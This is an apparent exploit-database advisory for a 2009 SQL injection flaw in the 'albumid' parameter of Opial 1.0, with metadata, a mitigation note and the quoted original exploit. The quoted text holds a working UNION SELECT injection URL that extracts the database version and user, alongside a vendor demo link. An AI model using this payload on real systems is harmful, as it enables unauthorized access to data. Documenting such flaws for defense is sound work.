Opial 1.0 (albumid) Remote SQL Injection Vuln

vendor:

Opial

by:

ThE g0bL!N

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Opial

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: N/A

Related CWE: N/A

CPE: a:opial:opial:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Opial 1.0 (albumid) Remote SQL Injection Vuln

A remote SQL injection vulnerability exists in Opial 1.0. An attacker can send a specially crafted HTTP request containing malicious SQL statements to the vulnerable application in order to gain access to unauthorized information or to manipulate data. The vulnerable parameter is 'albumid' which is not properly sanitized before being used in a SQL query.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

###################################################################
###################################################################
Opial 1.0 (albumid) Remote SQL Injection Vuln
###################################################################
Founder : ThE g0bL!N
###################################################################
###################################################################
SQL Injection Vulnerability  
###################################################################
Exploit:
###################################################################
http://www.path.com/albumdetail.php?albumid=-31+union/**/select/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,user(),16--
Demo:
----
http://www.opial.com/demo/
####################################################################
Greeting : Super_Ctistal (My Master)  And all Muslims&algerian Hackers

# milw0rm.com [2009-07-02]